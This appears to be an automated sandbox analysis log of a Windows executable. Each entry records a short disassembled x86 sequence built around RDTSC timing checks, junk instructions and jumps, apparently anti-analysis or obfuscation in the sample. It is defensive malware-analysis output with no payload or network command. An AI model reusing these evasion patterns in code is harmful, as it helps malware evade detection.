            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853DC second address: 4853E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853E2 second address: 4853E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4875F4 second address: 48761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EC5h 0x00000009 jmp 00007F2E7D257EC0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48761F second address: 487628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487628 second address: 48762E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48762E second address: 487656 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E7D1D3436h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2E7D1D3445h 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4877BD second address: 4877D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2E7D257EBDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4877D3 second address: 4877D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B60A second address: 48B610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B610 second address: 48B64E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007F2E7D1D3436h 0x00000010 jns 00007F2E7D1D3436h 0x00000016 pop edi 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2E7D1D343Eh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B64E second address: 48B654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B654 second address: 48B665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Ch 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B665 second address: 48B67A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D257EBAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d ja 00007F2E7D257EB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48AD9C second address: 48ADA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48AFF4 second address: 48B008 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F2E7D257EB6h 0x00000009 js 00007F2E7D257EB6h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B008 second address: 48B00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B00E second address: 48B012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F83D second address: 48F843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F843 second address: 48F87C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E7D257EB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2E7D257EC2h 0x00000012 jno 00007F2E7D257EB6h 0x00000018 jns 00007F2E7D257EB6h 0x0000001e jmp 00007F2E7D257EC7h 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC93 second address: 48FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC99 second address: 48FC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC9D second address: 48FCA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF6A second address: 48FF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF73 second address: 48FF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF77 second address: 48FF81 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E7D257EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4340B1 second address: 4340CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E7D1D3444h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4901E6 second address: 4901FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F2E7D257EB6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490BAC second address: 490BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2E7D1D3436h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f ja 00007F2E7D1D3436h 0x00000015 pushad 0x00000016 popad 0x00000017 jnl 00007F2E7D1D3436h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2E7D1D3447h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D01 second address: 494D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D05 second address: 494D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D0F second address: 494D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D13 second address: 494D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2E7D1D3444h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D3A second address: 494D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D40 second address: 494D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2E7D1D3449h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB943 second address: 3FB949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB949 second address: 3FB965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2E7D1D343Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F2E7D1D3436h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB965 second address: 3FB9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F2E7D257EBDh 0x00000010 js 00007F2E7D257ECFh 0x00000016 jmp 00007F2E7D257EC3h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB9A8 second address: 3FB9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494194 second address: 4941A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E7D257EB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945BD second address: 4945CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F2E7D1D343Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945CE second address: 4945D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945D4 second address: 4945DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945DA second address: 4945E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE4C second address: 49AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE66 second address: 49AE6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFDC second address: 49AFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFE0 second address: 49AFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F2E7D257EBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFF0 second address: 49AFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2E7D1D343Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFFE second address: 49B00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F2E7D257EBAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B2D8 second address: 49B2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B2DC second address: 49B2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B864 second address: 49B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3447h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B87F second address: 49B890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F2E7D257EB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C104 second address: 49C114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2286 second address: 4A228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A228E second address: 4A2294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B6 second address: 4A50BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50BE second address: 4A50D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jg 00007F2E7D1D343Ah 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50D4 second address: 4A50E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F2E7D257EB6h 0x0000000c popad 0x0000000d jbe 00007F2E7D257EBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A552E second address: 4A554E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A56A6 second address: 4A56CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push ebx 0x00000009 jmp 00007F2E7D257EC8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A56CB second address: 4A56D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A582C second address: 4A5834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5C8B second address: 4A5C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD6C5 second address: 4AD6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F2E7D257EC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E7D257EC6h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABCD9 second address: 4ABCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F2E7D1D3436h 0x00000010 je 00007F2E7D1D3436h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABE6A second address: 4ABE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2E7D257EC3h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC306 second address: 4AC31D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D1D3442h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D28 second address: 49F0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E7D257EC3h 0x00000009 sbb si, 22AEh 0x0000000e jmp 00007F2E7D257EC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F2E7D257EC7h 0x0000001f adc ax, 18BEh 0x00000024 jmp 00007F2E7D257EC9h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F2E7D257EC0h 0x00000030 adc ecx, 191BC9B8h 0x00000036 jmp 00007F2E7D257EBBh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 call 00007F2E7D257EBBh 0x00000046 pop eax 0x00000047 mov si, bx 0x0000004a popad 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DD2 second address: 49F0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2E7D1D343Dh 0x00000019 or si, 15B6h 0x0000001e jmp 00007F2E7D1D3441h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F2E7D1D3440h 0x0000002a jmp 00007F2E7D1D3445h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B8C second address: 4A00BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2E7D257EBBh 0x00000013 sbb cx, B19Eh 0x00000018 jmp 00007F2E7D257EC9h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BCD second address: 4A00BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C13 second address: 4A00C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C19 second address: 4A00C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 47ED2C5Eh 0x00000012 jmp 00007F2E7D1D3440h 0x00000017 call 00007F2EEE818360h 0x0000001c push 76042B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [760A4538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F2E7D1D3447h 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C66 second address: 4A00C99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov edx, 38F32F30h 0x00000011 mov dx, 0E5Ch 0x00000015 popad 0x00000016 mov dword ptr [ebp-1Ch], esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C99 second address: 4A00CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CB5 second address: 4A00CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CC7 second address: 4A00CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0B second address: 4A10C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0F second address: 4A10C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C13 second address: 4A10C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C19 second address: 4A10C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2E7D1D3446h 0x0000000f push eax 0x00000010 jmp 00007F2E7D1D343Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2E7D1D3444h 0x0000001d add ax, 4548h 0x00000022 jmp 00007F2E7D1D343Bh 0x00000027 popfd 0x00000028 push esi 0x00000029 mov cx, bx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C89 second address: 4A10C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C8D second address: 4A10CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CA0 second address: 4A10CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 28FA224Ah 0x00000008 call 00007F2E7D257EBBh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2E7D257EC0h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CCB second address: 4A10CFD instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F2E7D1D343Eh 0x0000000d sub esi, 31299C68h 0x00000013 jmp 00007F2E7D1D343Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CFD second address: 4A10D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
